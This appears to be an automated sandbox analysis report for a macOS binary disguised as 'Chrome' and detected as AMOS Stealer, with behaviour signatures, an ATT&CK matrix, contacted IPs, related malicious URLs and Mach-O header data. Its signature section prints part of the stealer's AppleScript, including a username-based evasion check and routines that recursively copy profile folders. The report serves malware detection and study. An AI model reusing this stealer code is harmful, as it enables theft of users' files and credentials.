Source: submissionFile header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>]
Source: submissionCode Signing Info: Signature=adhoc
Source: /usr/bin/osascript (PID: 622)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 622)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 622)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 622)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: submissionMach-O header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>]
Source: /usr/bin/osascript (PID: 622)Random device file read: /dev/randomJump to behavior
Source: /usr/bin/osascript (PID: 623)Random device file read: /dev/randomJump to behavior
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 641)Random device file read: /dev/randomJump to behavior
Source: submitted sampleStderr: 140:155: execution error: An error of type -1 has occurred. (-1): exit code = 0
Source: /usr/bin/osascript (PID: 622)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: submissionCodeSign Info: Executable=/Users/bernard/Desktop/Chrome
Source: ChromeSubmission file: section __const with 7.95657476 entropy (max. 8.0)
Source: ChromeSubmission file: section __const with 7.99234386 entropy (max. 8.0)
Source: /usr/bin/osascript (PID: 622)Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrcJump to behavior
Source: /usr/bin/osascript (PID: 623)Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrcJump to behavior
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/osascript (PID: 622)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/osascript (PID: 623)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information

barindex
Source: /bin/sh (PID: 623)AMOS Stealer Osscript: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorrJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
AppleScript
1
Scripting
Path Interception11
Invalid Code Signature
OS Credential Dumping11
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Malicious File
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Code Signing
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Hidden Files and Directories
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638499 Sample: Chrome Startdate: 14/03/2025 Architecture: MAC Score: 52 17 151.101.3.6, 443, 49391, 49392 FASTLYUS United States 2->17 19 151.101.67.6, 443, 49350, 49352 FASTLYUS United States 2->19 21 184.31.53.25, 49344, 80 AKAMAI-ASUS United States 2->21 6 mono-sgen32 Chrome 2->6         started        8 xpcproxy nsurlstoraged 2->8         started        10 xpcproxy eficheck 2->10         started        process3 process4 12 sh osascript 6->12         started        15 sh osascript 6->15         started        signatures5 23 Detected AMOS Stealer 12->23 25 Executes Apple scripts with very long statement arguments 12->25

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


cam-macmac-stand
SourceDetectionScannerLabelLink
Chrome0%ReversingLabs
Chrome0%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
184.31.53.25
unknownUnited States
16625AKAMAI-ASUSfalse
151.101.3.6
unknownUnited States
54113FASTLYUSfalse
151.101.67.6
unknownUnited States
54113FASTLYUSfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
151.101.3.6http://www.citibank2.com/citibank/citi/indexGet hashmaliciousUnknownBrowse
    AvayaWorkplaceMacOS-3.38.0.147.18.dmgGet hashmaliciousUnknownBrowse
      https://jok.darfeistud.ru/n0raBLCJ/Get hashmaliciousUnknownBrowse
        https://vdot.virginia-ticketrb.xin/us/Get hashmaliciousUnknownBrowse
          TotalAV.dmgGet hashmaliciousUnknownBrowse
            Factura.pdfGet hashmaliciousUnknownBrowse
              Chrome_7.13.dmg-Malware.dmgGet hashmaliciousAMOS StealerBrowse
                https://u1.tightlyreporter.shop/sosalkino.movGet hashmaliciousUnknownBrowse
                  https://email.m.teachable.com/c/eJwsjjmO7CAYBk8DoQUfZgsIXuJrtH4WP9DYsgVMn3_kVsdVKlUO0RTyvARplYO2UjleTmrHq5dU2j1fLQcGSOu8kMY5zwBeg4_KRMRd7xnaU8YaNZHNWpTVi2R4CxDQQiohrYR0SwasszBxjzkqZdgqzmUWSpXiUZZ0nfwIdc57MPWPYWPYcm-jzkb5PR_OsNHvrPwsY9D_8j1TqzBeq2erh5N6esLUf65-f6Ij1es6vjIUrBUf-R3wFwAA__9VN0p8#a2FzcGFyYXNrckB1bml0eTNkLmNvbQ==Get hashmaliciousUnknownBrowse
                    https://smthwentwrong.comGet hashmaliciousUnknownBrowse
                      151.101.67.6http://www.citibank2.com/citibank/citi/indexGet hashmaliciousUnknownBrowse
                        AvayaWorkplaceMacOS-3.38.0.147.18.dmgGet hashmaliciousUnknownBrowse
                          https://vdot.virginia-ticketrb.xin/us/Get hashmaliciousUnknownBrowse
                            https://DvRg.atbuovpkz.com/TYjSz/Get hashmaliciousUnknownBrowse
                              https://streetfurniture.com/r-u-ok/Get hashmaliciousUnknownBrowse
                                https://fax304993.courtaccountinghub.com/4G6YvGet hashmaliciousUnknownBrowse
                                  https://email.m.teachable.com/c/eJwsjjmO7CAYBk8DoQUfZgsIXuJrtH4WP9DYsgVMn3_kVsdVKlUO0RTyvARplYO2UjleTmrHq5dU2j1fLQcGSOu8kMY5zwBeg4_KRMRd7xnaU8YaNZHNWpTVi2R4CxDQQiohrYR0SwasszBxjzkqZdgqzmUWSpXiUZZ0nfwIdc57MPWPYWPYcm-jzkb5PR_OsNHvrPwsY9D_8j1TqzBeq2erh5N6esLUf65-f6Ij1es6vjIUrBUf-R3wFwAA__9VN0p8#a2FzcGFyYXNrckB1bml0eTNkLmNvbQ==Get hashmaliciousUnknownBrowse
                                    CitrixReceiver11_4_3.dmgGet hashmaliciousUnknownBrowse
                                      RVtdWepyLqGet hashmaliciousRealstBrowse
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        FASTLYUShttp://188.114.96.0Get hashmaliciousUnknownBrowse
                                        • 151.101.65.229
                                        https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptGet hashmaliciousUnknownBrowse
                                        • 185.199.108.133
                                        VM Orger Acknowledged.zipGet hashmaliciousUnknownBrowse
                                        • 151.101.66.137
                                        http://188.114.97.3Get hashmaliciousUnknownBrowse
                                        • 151.101.65.140
                                        http://188.114.96.3Get hashmaliciousUnknownBrowse
                                        • 151.101.1.140
                                        https://unifranckm.weebly.comGet hashmaliciousUnknownBrowse
                                        • 151.101.1.46
                                        https://mietamasklogiene.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                        • 151.101.1.140
                                        https://dev-temporary-ru.pantheonsite.io/wp-content/uploads/2025/03/iukhc.htmlGet hashmaliciousUnknownBrowse
                                        • 23.185.0.2
                                        https://kjhgt55555555555.blogspot.com/Get hashmaliciousUnknownBrowse
                                        • 151.101.194.137
                                        https://0b47290b-5060-43ed-ab52-5c7b4505b80e-00-bb74c8jbda1u.kirk.replit.dev/Get hashmaliciousUnknownBrowse
                                        • 151.101.193.229
                                        AKAMAI-ASUShttp://188.114.96.0Get hashmaliciousUnknownBrowse
                                        • 2.23.65.88
                                        Quotation.xlsGet hashmaliciousUnknownBrowse
                                        • 23.60.203.209
                                        http://188.114.97.3Get hashmaliciousUnknownBrowse
                                        • 104.73.230.208
                                        http://188.114.96.3Get hashmaliciousUnknownBrowse
                                        • 104.73.230.208
                                        Quotation.xlsGet hashmaliciousUnknownBrowse
                                        • 23.199.214.10
                                        RV Please verify your email preferences.msgGet hashmaliciousUnknownBrowse
                                        • 23.60.203.209
                                        https://gamma.app/docs/britcham-Singapore-are-British-nationals-those-employed-organisat-c99ei1men1fb7in?mode=present#card-wk0hejkpgymg97cGet hashmaliciousUnknownBrowse
                                        • 2.16.202.120
                                        https://pub-399fabd179d94f9eacc22f9f01cf7fae.r2.dev/AT&T%20YAHOO$$$$.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 104.73.230.208
                                        random.exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.73.234.102
                                        random(8).exeGet hashmaliciousLummaC StealerBrowse
                                        • 104.73.234.102
                                        FASTLYUShttp://188.114.96.0Get hashmaliciousUnknownBrowse
                                        • 151.101.65.229
                                        https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptGet hashmaliciousUnknownBrowse
                                        • 185.199.108.133
                                        VM Orger Acknowledged.zipGet hashmaliciousUnknownBrowse
                                        • 151.101.66.137
                                        http://188.114.97.3Get hashmaliciousUnknownBrowse
                                        • 151.101.65.140
                                        http://188.114.96.3Get hashmaliciousUnknownBrowse
                                        • 151.101.1.140
                                        https://unifranckm.weebly.comGet hashmaliciousUnknownBrowse
                                        • 151.101.1.46
                                        https://mietamasklogiene.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                        • 151.101.1.140
                                        https://dev-temporary-ru.pantheonsite.io/wp-content/uploads/2025/03/iukhc.htmlGet hashmaliciousUnknownBrowse
                                        • 23.185.0.2
                                        https://kjhgt55555555555.blogspot.com/Get hashmaliciousUnknownBrowse
                                        • 151.101.194.137
                                        https://0b47290b-5060-43ed-ab52-5c7b4505b80e-00-bb74c8jbda1u.kirk.replit.dev/Get hashmaliciousUnknownBrowse
                                        • 151.101.193.229
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        5c118da645babe52f060d0754256a73cAvayaWorkplaceMacOS-3.38.0.147.18.dmgGet hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        https://jok.darfeistud.ru/n0raBLCJ/Get hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        https://vdot.virginia-ticketrb.xin/usGet hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        https://vdot.virginia-ticketrb.xin/us/Get hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        TotalAV.dmgGet hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        https://DvRg.atbuovpkz.com/TYjSz/Get hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        Factura.pdfGet hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        https://streetfurniture.com/r-u-ok/Get hashmaliciousUnknownBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        Chrome_7.13.dmg-Malware.dmgGet hashmaliciousAMOS StealerBrowse
                                        • 151.101.3.6
                                        • 17.253.7.136
                                        • 151.101.67.6
                                        No context
                                        No created / dropped files found
                                        File type:Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>]
                                        Entropy (8bit):3.466987960314955
                                        TrID:
                                        • Mac OS X Universal Binary executable (4004/1) 75.96%
                                        • HSC music composer song (1267/141) 24.04%
                                        File name:Chrome
                                        File size:151'280 bytes
                                        MD5:72676069d026c215aef39c18314a2744
                                        SHA1:8bbd7dc2d8721215b8606b1b0aa2c48254d0d60e
                                        SHA256:11317b3ba43ea9dc46d169c9b053660e184ff93a9e98eddcb349eafde3bc845c
                                        SHA512:f9065bc4b95c9f1373b17e3f55915a8939d03e63cea1a4efbe94ad6699735af8b8f97485d610a6291564db78686e81d6a27db953c500780c100c9c0bdade84fb
                                        SSDEEP:768:FDJ6nbD9uCM7+/o46ntXK9bNxUAWTZVlhyOQlnXELGP5qbEGMOS1XHSoJ:A9DutXKpbUDVlhyOQlXELKexo
                                        TLSH:85E3D0536B0D260AC8EF56F44AEF43C75766F4844FA3431B738096292EDB3A19E58C1B
                                        File Content Preview:..................@.......................N....................................................................................................................................................................................................................
                                        ["Executable=/Users/bernard/Desktop/Chrome","Identifier=Chrome-55554944d44c2194013c3260b5313a07d2a314e1","Format=Mach-O universal (x86_64 arm64)","CodeDirectory v=20400 size=456 flags=0x2(adhoc) hashes=8+2 location=embedded","VersionPlatform=1","VersionMin=658688","VersionSDK=983552","Hash type=sha256 size=32","CandidateCDHash sha256=dc13ece95255b0a7f87d5051e1bc42af57a793d0","Hash choices=sha256","Executable Segment base=0","Executable Segment limit=24576","Executable Segment flags=0x1","Page size=4096","CDHash=dc13ece95255b0a7f87d5051e1bc42af57a793d0","Signature=adhoc","Info.plist=not bound","TeamIdentifier=not set","Sealed Resources=none","Internal requirements count=0 size=12"]
                                        General Information for header 1
                                        Endian:little-endian
                                        Size:64-bit
                                        Architecture:x86_64
                                        Filetype:execute
                                        Nbr. of load commands:17
                                        Entry point:0x10000075C
                                        NameValue
                                        segname__PAGEZERO
                                        vmaddr0x0
                                        vmsize0x100000000
                                        fileoff0x0
                                        filesize0x0
                                        maxprot0x0
                                        initprot0x0
                                        nsects0
                                        flags0x0
                                        NameValue
                                        segname__TEXT
                                        vmaddr0x100000000
                                        vmsize0x6000
                                        fileoff0x0
                                        filesize0x6000
                                        maxprot0x5
                                        initprot0x5
                                        nsects7
                                        flags0x0
                                        Datas
                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                        __text__TEXT0x10000075C0x3430x75C5.8408592010x000x80000400
                                        __stubs__TEXT0x100000AA00x4E0xAA02.8170870710x000x80000400
                                        __stub_helper__TEXT0x100000AEE0x7E0xAEE3.4018634300x000x80000400
                                        __gcc_except_tab__TEXT0x100000B6C0x380xB6C3.9839061020x000x0
                                        __const__TEXT0x100000BA40x53C40xBA47.9565747620x000x0
                                        __cstring__TEXT0x100005F680xD0x5F683.3927474100x000x0
                                        __unwind_info__TEXT0x100005F780x880x5F782.6586909120x000x0
                                        NameValue
                                        segname__DATA
                                        vmaddr0x100006000
                                        vmsize0x1000
                                        fileoff0x6000
                                        filesize0x1000
                                        maxprot0x3
                                        initprot0x3
                                        nsects3
                                        flags0x0
                                        Datas
                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                        __got__DATA0x1000060000x400x6000-0.0000000030x000x0
                                        __la_symbol_ptr__DATA0x1000060400x580x60402.0361610230x000x0
                                        __data__DATA0x1000060980x80x6098-0.0000000030x000x0
                                        NameValue
                                        segname__LINKEDIT
                                        vmaddr0x100007000
                                        vmsize0x8000
                                        fileoff0x7000
                                        filesize0x4D90
                                        maxprot0x1
                                        initprot0x1
                                        nsects0
                                        flags0x0
                                        NameValue
                                        rebase_off28672
                                        rebase_size8
                                        bind_off28680
                                        bind_size168
                                        weak_bind_off28848
                                        weak_bind_size56
                                        lazy_bind_off28904
                                        lazy_bind_size232
                                        export_off29136
                                        export_size48
                                        NameValue
                                        symoff29200
                                        nsyms21
                                        stroff29664
                                        strsize344
                                        NameValue
                                        ilocalsym0
                                        nlocalsym1
                                        iextdefsym1
                                        nextdefsym1
                                        iundefsym2
                                        nundefsym19
                                        tocoff0
                                        ntoc0
                                        modtaboff0
                                        nmodtab0
                                        extrefsymoff0
                                        nextrefsyms0
                                        indirectsymoff29536
                                        nindirectsyms32
                                        extreloff0
                                        nextrel0
                                        locreloff0
                                        nlocrel0
                                        NameValue
                                        NameValue
                                        uuid4d0f5560-5b51-3ee1-afda-dc90d460a3c6
                                        NameValue
                                        version10.13.0
                                        sdk15.2.0
                                        NameValue
                                        path0.0.0.0.0
                                        NameValue
                                        NameValue
                                        compatibility_version1.0.0
                                        current_version1800.105.0
                                        timestamp1970-01-01
                                        Datas/usr/lib/libc++.1.dylib
                                        NameValue
                                        compatibility_version1.0.0
                                        current_version1351.0.0
                                        timestamp1970-01-01
                                        Datas/usr/lib/libSystem.B.dylib
                                        NameValue
                                        dataoff29184
                                        datasize16
                                        NameValue
                                        dataoff29200
                                        datasize0
                                        NameValue
                                        dataoff30016
                                        datasize18512
                                        NameCategoryOriginSegment NameBind AddressLibrary Name
                                        __mh_execute_headerEXTERNALLC_SYMTAB
                                        radr://5614542LOCALLC_SYMTAB
                                        __Unwind_ResumeUNDEFINEDLC_SYMTAB__DATA0x100006040/usr/lib/libSystem.B.dylib
                                        __ZNSt11logic_errorC2EPKcUNDEFINEDLC_SYMTAB__DATA0x100006048/usr/lib/libc++.1.dylib
                                        __ZNSt12length_errorD1EvUNDEFINEDLC_SYMTAB__DATA0x100006000/usr/lib/libc++.1.dylib
                                        __ZTISt12length_errorUNDEFINEDLC_SYMTAB__DATA0x100006008
                                        __ZTVSt12length_errorUNDEFINEDLC_SYMTAB__DATA0x100006010/usr/lib/libc++.1.dylib
                                        __ZdlPvUNDEFINEDLC_SYMTAB__DATA0x100006018
                                        __ZnwmUNDEFINEDLC_SYMTAB__DATA0x100006020
                                        ___bzeroUNDEFINEDLC_SYMTAB__DATA0x100006050/usr/lib/libSystem.B.dylib
                                        ___cxa_allocate_exceptionUNDEFINEDLC_SYMTAB__DATA0x100006058/usr/lib/libc++.1.dylib
                                        ___cxa_free_exceptionUNDEFINEDLC_SYMTAB__DATA0x100006060/usr/lib/libc++.1.dylib
                                        ___cxa_throwUNDEFINEDLC_SYMTAB__DATA0x100006068/usr/lib/libc++.1.dylib
                                        ___gxx_personality_v0UNDEFINEDLC_SYMTAB__DATA0x100006028/usr/lib/libc++.1.dylib
                                        ___stack_chk_failUNDEFINEDLC_SYMTAB__DATA0x100006070/usr/lib/libSystem.B.dylib
                                        ___stack_chk_guardUNDEFINEDLC_SYMTAB__DATA0x100006030/usr/lib/libSystem.B.dylib
                                        _memcpyUNDEFINEDLC_SYMTAB__DATA0x100006078/usr/lib/libSystem.B.dylib
                                        _memmoveUNDEFINEDLC_SYMTAB__DATA0x100006080/usr/lib/libSystem.B.dylib
                                        _strlenUNDEFINEDLC_SYMTAB__DATA0x100006088/usr/lib/libSystem.B.dylib
                                        _systemUNDEFINEDLC_SYMTAB__DATA0x100006090/usr/lib/libSystem.B.dylib
                                        dyld_stub_binderUNDEFINEDLC_SYMTAB__DATA0x100006038/usr/lib/libSystem.B.dylib

                                        General Information for header 2
                                        Endian:little-endian
                                        Size:64-bit
                                        Architecture:arm64
                                        Filetype:execute
                                        Nbr. of load commands:18
                                        Entry point:0x1000026C8
                                        NameValue
                                        segname__PAGEZERO
                                        vmaddr0x0
                                        vmsize0x100000000
                                        fileoff0x0
                                        filesize0x0
                                        maxprot0x0
                                        initprot0x0
                                        nsects0
                                        flags0x0
                                        NameValue
                                        segname__TEXT
                                        vmaddr0x100000000
                                        vmsize0x8000
                                        fileoff0x0
                                        filesize0x8000
                                        maxprot0x5
                                        initprot0x5
                                        nsects7
                                        flags0x0
                                        Datas
                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                        __text__TEXT0x1000026C80x3680x26C86.2635088320x000x80000400
                                        __stubs__TEXT0x100002A300x9C0x2A303.4897502920x000x80000400
                                        __stub_helper__TEXT0x100002ACC0x9C0x2ACC3.5671732720x000x80000400
                                        __gcc_except_tab__TEXT0x100002B680x3C0x2B683.7250107620x000x0
                                        __const__TEXT0x100002BA40x53C40x2BA47.9923438620x000x0
                                        __cstring__TEXT0x100007F680xD0x7F683.3927474100x000x0
                                        __unwind_info__TEXT0x100007F780x880x7F782.4822095820x000x0
                                        NameValue
                                        segname__DATA_CONST
                                        vmaddr0x100008000
                                        vmsize0x4000
                                        fileoff0x8000
                                        filesize0x4000
                                        maxprot0x3
                                        initprot0x3
                                        nsects1
                                        flags0x10
                                        Datas
                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                        __got__DATA_CONST0x1000080000x480x8000-0.0000000030x000x0
                                        NameValue
                                        segname__DATA
                                        vmaddr0x10000C000
                                        vmsize0x4000
                                        fileoff0xC000
                                        filesize0x4000
                                        maxprot0x3
                                        initprot0x3
                                        nsects2
                                        flags0x0
                                        Datas
                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                        __la_symbol_ptr__DATA0x10000C0000x580xC0002.0868927630x000x0
                                        __data__DATA0x10000C0580x80xC058-0.0000000030x000x0
                                        NameValue
                                        segname__LINKEDIT
                                        vmaddr0x100010000
                                        vmsize0x8000
                                        fileoff0x10000
                                        filesize0x4EF0
                                        maxprot0x1
                                        initprot0x1
                                        nsects0
                                        flags0x0
                                        NameValue
                                        rebase_off65536
                                        rebase_size8
                                        bind_off65544
                                        bind_size200
                                        weak_bind_off65744
                                        weak_bind_size56
                                        lazy_bind_off65800
                                        lazy_bind_size232
                                        export_off66032
                                        export_size48
                                        NameValue
                                        symoff66096
                                        nsyms22
                                        stroff66584
                                        strsize360
                                        NameValue
                                        ilocalsym0
                                        nlocalsym1
                                        iextdefsym1
                                        nextdefsym1
                                        iundefsym2
                                        nundefsym20
                                        tocoff0
                                        ntoc0
                                        modtaboff0
                                        nmodtab0
                                        extrefsymoff0
                                        nextrefsyms0
                                        indirectsymoff66448
                                        nindirectsyms33
                                        extreloff0
                                        nextrel0
                                        locreloff0
                                        nlocrel0
                                        NameValue
                                        NameValue
                                        uuidd44c2194-013c-3260-b531-3a07d2a314e1
                                        NameValue
                                        NameValue
                                        path0.0.0.0.0
                                        NameValue
                                        NameValue
                                        compatibility_version1.0.0
                                        current_version1800.105.0
                                        timestamp1970-01-01
                                        Datas/usr/lib/libc++.1.dylib
                                        NameValue
                                        compatibility_version1.0.0
                                        current_version1351.0.0
                                        timestamp1970-01-01
                                        Datas/usr/lib/libSystem.B.dylib
                                        NameValue
                                        dataoff66080
                                        datasize16
                                        NameValue
                                        dataoff66096
                                        datasize0
                                        NameValue
                                        dataoff66944
                                        datasize18800
                                        NameCategoryOriginSegment NameBind AddressLibrary Name
                                        __mh_execute_headerEXTERNALLC_SYMTAB
                                        radr://5614542LOCALLC_SYMTAB
                                        __Unwind_ResumeUNDEFINEDLC_SYMTAB__DATA0x10000C000/usr/lib/libSystem.B.dylib
                                        __ZNSt11logic_errorC2EPKcUNDEFINEDLC_SYMTAB__DATA0x10000C008/usr/lib/libc++.1.dylib
                                        __ZNSt12length_errorD1EvUNDEFINEDLC_SYMTAB__DATA_CONST0x100008000/usr/lib/libc++.1.dylib
                                        __ZTISt12length_errorUNDEFINEDLC_SYMTAB__DATA_CONST0x100008008
                                        __ZTVSt12length_errorUNDEFINEDLC_SYMTAB__DATA_CONST0x100008010/usr/lib/libc++.1.dylib
                                        __ZdlPvUNDEFINEDLC_SYMTAB__DATA_CONST0x100008018
                                        __ZnwmUNDEFINEDLC_SYMTAB__DATA_CONST0x100008020
                                        ___chkstk_darwinUNDEFINEDLC_SYMTAB__DATA_CONST0x100008028/usr/lib/libSystem.B.dylib
                                        ___cxa_allocate_exceptionUNDEFINEDLC_SYMTAB__DATA0x10000C010/usr/lib/libc++.1.dylib
                                        ___cxa_free_exceptionUNDEFINEDLC_SYMTAB__DATA0x10000C018/usr/lib/libc++.1.dylib
                                        ___cxa_throwUNDEFINEDLC_SYMTAB__DATA0x10000C020/usr/lib/libc++.1.dylib
                                        ___gxx_personality_v0UNDEFINEDLC_SYMTAB__DATA_CONST0x100008030/usr/lib/libc++.1.dylib
                                        ___stack_chk_failUNDEFINEDLC_SYMTAB__DATA0x10000C028/usr/lib/libSystem.B.dylib
                                        ___stack_chk_guardUNDEFINEDLC_SYMTAB__DATA_CONST0x100008038/usr/lib/libSystem.B.dylib
                                        _bzeroUNDEFINEDLC_SYMTAB__DATA0x10000C030/usr/lib/libSystem.B.dylib
                                        _memcpyUNDEFINEDLC_SYMTAB__DATA0x10000C038/usr/lib/libSystem.B.dylib
                                        _memmoveUNDEFINEDLC_SYMTAB__DATA0x10000C040/usr/lib/libSystem.B.dylib
                                        _strlenUNDEFINEDLC_SYMTAB__DATA0x10000C048/usr/lib/libSystem.B.dylib
                                        _systemUNDEFINEDLC_SYMTAB__DATA0x10000C050/usr/lib/libSystem.B.dylib
                                        dyld_stub_binderUNDEFINEDLC_SYMTAB__DATA_CONST0x100008040/usr/lib/libSystem.B.dylib
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 14, 2025 13:10:16.248924971 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.249739885 CET49351443192.168.11.1217.253.7.136
